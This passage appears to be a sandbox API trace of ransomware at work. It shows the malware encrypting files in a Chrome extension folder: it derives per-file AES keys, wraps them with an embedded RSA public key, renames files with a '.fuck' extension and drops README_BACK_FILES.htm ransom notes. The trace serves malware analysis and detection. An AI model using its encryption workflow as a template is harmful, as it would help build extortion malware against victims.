pdwDataLen=0x2b9c394*=0x380) returned 1 [0251.642] WriteFile (in: hFile=0x5d60, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0251.644] ReadFile (in: hFile=0x5d50, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0251.644] CryptEncrypt (in: hKey=0x29840e0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0251.644] WriteFile (in: hFile=0x5d60, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0251.644] ReadFile (in: hFile=0x5d50, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0251.644] CryptEncrypt (in: hKey=0x29840e0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9c394*=0x380, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9c394*=0x380) returned 1 [0251.644] WriteFile (in: hFile=0x5d60, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9c394*=0x380, lpOverlapped=0x0) returned 1 [0251.644] ReadFile (in: hFile=0x5d50, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9c394*=0x2ce, lpOverlapped=0x0) returned 1 [0251.644] CryptEncrypt (in: hKey=0x29840e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9c394*=0x2ce, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9c394*=0x2d0) returned 1 [0251.645] WriteFile (in: hFile=0x5d60, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x2d0, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9c394*=0x2d0, lpOverlapped=0x0) returned 1 [0251.645] CloseHandle (hObject=0x5d50) returned 1 [0251.645] CloseHandle (hObject=0x5d60) returned 1 [0251.645] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\128.png.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\128.png.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\128.png" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\128.png"), bFailIfExists=0) returned 1 [0251.648] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\128.png", dwFileAttributes=0x0) returned 1 [0251.648] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\128.png.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\128.png.gsg")) returned 1 [0251.650] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\128.png" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\128.png"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\128.png.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\128.png.fuck")) returned 1 [0251.652] CryptDestroyHash (hHash=0x2985a20) returned 1 [0251.652] CryptDestroyKey (hKey=0x29840e0) returned 1 [0251.652] CryptReleaseContext (hProv=0x29892f8, dwFlags=0x0) returned 1 [0251.652] FindNextFileA (in: hFindFile=0x2985f20, lpFindFileData=0x2b9d480 | out: lpFindFileData=0x2b9d480) returned 1 [0251.653] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9d390 | out: lpSystemTimeAsFileTime=0x2b9d390) [0251.653] GetLastError () returned 0x0 [0251.653] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\manifest.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\manifest.json")) returned 0x20 [0251.653] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\manifest.json", dwFileAttributes=0x80) returned 1 [0251.655] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\manifest.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\manifest.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0251.656] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\manifest.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\manifest.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d50 [0251.658] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\manifest.json.gsg", dwFileAttributes=0x2) returned 1 [0251.659] CryptAcquireContextA (in: phProv=0x2b9c38c, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9c38c*=0x2989958) returned 1 [0251.663] CryptCreateHash (in: hProv=0x2989958, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9c390 | out: phHash=0x2b9c390) returned 1 [0251.663] lstrlenA (lpString="YpinUbJDdIEgxfEoLIcGdepQzMlQm") returned 29 [0251.663] CryptHashData (hHash=0x2985a20, pbData=0x28cb5a8, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0251.663] CryptDeriveKey (in: hProv=0x2989958, Algid=0x6610, hBaseData=0x2985a20, dwFlags=0x1000000, phKey=0x2b9c37c | out: phKey=0x2b9c37c*=0x2984620) returned 1 [0251.663] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----b", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9c398, pcbBinary=0x2b9c378, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9c398, pcbBinary=0x2b9c378, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0251.663] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9c398, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9c36c, pcbStructInfo=0x2b9c374 | out: pvStructInfo=0x2b9c36c, pcbStructInfo=0x2b9c374) returned 1 [0251.663] CryptAcquireContextA (in: phProv=0x2b9c388, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9c388*=0x29899e0) returned 1 [0251.664] CryptImportPublicKeyInfo (in: hCryptProv=0x29899e0, dwCertEncodingType=0x1, pInfo=0x2992360*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2992390*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2992398*, PublicKey.cUnusedBits=0x0), phKey=0x2b9c380 | out: phKey=0x2b9c380*=0x29845a0) returned 1 [0251.664] CryptEncrypt (in: hKey=0x29845a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9c370*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9c370*=0x80) returned 1 [0251.664] CryptEncrypt (in: hKey=0x29845a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x29892f8*, pdwDataLen=0x2b9c384*=0x18, dwBufLen=0x80 | out: pbData=0x29892f8*, pdwDataLen=0x2b9c384*=0x80) returned 1 [0251.664] WriteFile (in: hFile=0x5d50, lpBuffer=0x29892f8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x29892f8*, lpNumberOfBytesWritten=0x2b9c394*=0x80, lpOverlapped=0x0) returned 1 [0251.667] ReadFile (in: hFile=0x5d60, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9c394*=0x2d8, lpOverlapped=0x0) returned 1 [0251.683] CryptEncrypt (in: hKey=0x2984620, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9c394*=0x2d8, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9c394*=0x2e0) returned 1 [0251.683] WriteFile (in: hFile=0x5d50, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x2e0, lpNumberOfBytesWritten=0x2b9c394, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9c394*=0x2e0, lpOverlapped=0x0) returned 1 [0251.685] CloseHandle (hObject=0x5d60) returned 1 [0251.685] CloseHandle (hObject=0x5d50) returned 1 [0251.685] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\manifest.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\manifest.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\manifest.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\manifest.json"), bFailIfExists=0) returned 1 [0251.689] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\manifest.json", dwFileAttributes=0x0) returned 1 [0251.689] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\manifest.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\manifest.json.gsg")) returned 1 [0251.691] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\manifest.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\manifest.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\manifest.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\manifest.json.fuck")) returned 1 [0251.693] CryptDestroyHash (hHash=0x2985a20) returned 1 [0251.693] CryptDestroyKey (hKey=0x2984620) returned 1 [0251.693] CryptReleaseContext (hProv=0x2989958, dwFlags=0x0) returned 1 [0251.693] FindNextFileA (in: hFindFile=0x2985f20, lpFindFileData=0x2b9d480 | out: lpFindFileData=0x2b9d480) returned 1 [0251.693] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\*.*", lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 0x2985ba0 [0251.728] FindNextFileA (in: hFindFile=0x2985ba0, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0251.728] FindNextFileA (in: hFindFile=0x2985ba0, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0251.728] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ar\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2985a20 [0251.729] FindNextFileA (in: hFindFile=0x2985a20, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0251.729] FindNextFileA (in: hFindFile=0x2985a20, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0251.729] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0251.729] GetLastError () returned 0x0 [0251.729] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ar\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ar\\messages.json")) returned 0x20 [0251.729] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ar\\messages.json", dwFileAttributes=0x80) returned 1 [0251.730] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ar\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ar\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0251.730] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ar\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ar\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d64 [0251.731] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ar\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0251.731] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2989af0) returned 1 [0251.734] CryptCreateHash (in: hProv=0x2989af0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0251.734] lstrlenA (lpString="KbTPpdThroOLqoAPDACZIGRTzMlQm") returned 29 [0251.734] CryptHashData (hHash=0x29846a0, pbData=0x28cb580, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0251.734] CryptDeriveKey (in: hProv=0x2989af0, Algid=0x6610, hBaseData=0x29846a0, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x29841a0) returned 1 [0251.734] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----b", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0251.734] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0251.734] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2989f30) returned 1 [0251.734] CryptImportPublicKeyInfo (in: hCryptProv=0x2989f30, dwCertEncodingType=0x1, pInfo=0x2991b40*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2991b70*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2991b78*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2984320) returned 1 [0251.735] CryptEncrypt (in: hKey=0x2984320, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0251.735] CryptEncrypt (in: hKey=0x2984320, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2989958*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2989958*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0251.735] WriteFile (in: hFile=0x5d64, lpBuffer=0x2989958*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2989958*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0251.736] ReadFile (in: hFile=0x5d5c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bc5c*=0xb3, lpOverlapped=0x0) returned 1 [0251.737] CryptEncrypt (in: hKey=0x29841a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xb3, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xc0) returned 1 [0251.737] WriteFile (in: hFile=0x5d64, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0xc0, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bc5c*=0xc0, lpOverlapped=0x0) returned 1 [0251.738] CloseHandle (hObject=0x5d5c) returned 1 [0251.738] CloseHandle (hObject=0x5d64) returned 1 [0251.738] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ar\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ar\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ar\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ar\\messages.json"), bFailIfExists=0) returned 1 [0251.742] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ar\\messages.json", dwFileAttributes=0x0) returned 1 [0251.742] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ar\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ar\\messages.json.gsg")) returned 1 [0251.744] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ar\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ar\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ar\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ar\\messages.json.fuck")) returned 1 [0251.745] CryptDestroyHash (hHash=0x29846a0) returned 1 [0251.745] CryptDestroyKey (hKey=0x29841a0) returned 1 [0251.745] CryptReleaseContext (hProv=0x2989af0, dwFlags=0x0) returned 1 [0251.745] FindNextFileA (in: hFindFile=0x2985a20, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0251.745] FindClose (in: hFindFile=0x2985a20 | out: hFindFile=0x2985a20) returned 1 [0251.745] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ar\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ar\\readme_back_files.htm")) returned 0xffffffff [0251.745] AreFileApisANSI () returned 1 [0251.745] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e37a8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 155 [0251.745] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ar\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\ar\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0251.746] GetFileType (hFile=0x5d60) returned 0x1 [0251.747] WriteFile (in: hFile=0x5d60, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0251.748] FindNextFileA (in: hFindFile=0x2985ba0, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0251.748] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\bg\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2985a20 [0251.748] FindNextFileA (in: hFindFile=0x2985a20, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0251.748] FindNextFileA (in: hFindFile=0x2985a20, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0251.748] 